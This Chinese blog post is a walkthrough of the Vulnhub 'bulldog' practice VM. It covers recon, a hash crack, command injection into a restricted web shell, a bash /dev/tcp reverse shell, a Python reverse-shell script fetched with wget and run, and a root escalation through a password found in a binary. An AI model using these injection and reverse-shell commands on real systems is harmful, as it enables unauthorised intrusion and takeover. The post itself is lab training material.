Vulnhub--bulldog

配置:
VirtualBox运行靶机bulldog,网卡设置为Host-only;
VMware下运行kali作为攻击机,网卡设置为桥接模式Vritual box Host-only
 
Kali:192.168.56.102
bulldog:192.168.56.103
 
netdiscover -r 192.168.56.0/24
发现靶机IP:192.168.56.103
 
nmap -T4 -A -v -p- 192.168.56.103
开放了23、80、8080三个端口,发现ssh服务和web服务
 
dirsearch扫描下目录
 
访问/dev发现一个shell,但目前没登录还不能使用
查看/dev源代码发现
将Sarah的mad5值解码得到bulldoglover
访问/admin成功登录,提示没有权限
 
Linux提权
访问之前发现的/dev/shell
显示可以执行命令但只可以执行以上命令,尝试用&进行绕过
 
kali启动监听
nc -lvnp 4444
 
在/dev/shell输入
ls &&echo "bash -i >& /dev/tcp/192.168.56.102/4444 0>&1" | bash
 
拿到shell
 
cat /etc/passwd
 
cd /home/bulldogadmin
查看包括隐藏文件的全部文件
ls -la
 
查看.hiddenadmindirectory文件, 有note和customPermissionApp
note提示django用户有时有root权限
cat打开customPermissionApp文件都是乱码,用strings打开
strings customPermissionApp
发现密码:SUPERultimatePASSWORDyouCANTget
 
sudo在你输入密码的时候本质上是读取了键盘,而不是bash里面输入的字符。因此为了能够输入密码,我们必须模拟一个终端设备。python就有这样的功能。
用python调用本地的shell命令,利用python pty模块的shell来进行交互
 
python -c 'import pty;pty.spawn("/bin/sh")'
sudo su
 
输入密码拿到root权限
 
读取flag文件
 
 
另一种shell反弹方法:
在Kali上用python搭建一个简单HTTP服务器
python -m SimpleHTTPServer 80
 
shell脚本python-shell.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.102",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
把shell放到搭建的网站目录下
在192.168.56.103/dev/shell执行以下命令
pwd&wget http://192.168.56.102/python-shell.py
在kali监听
nc -lvnp 4444
 
/dev/shell下继续执行反弹脚本
pwd&python python-shell.py
 
kali得到shell
 
 
 
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值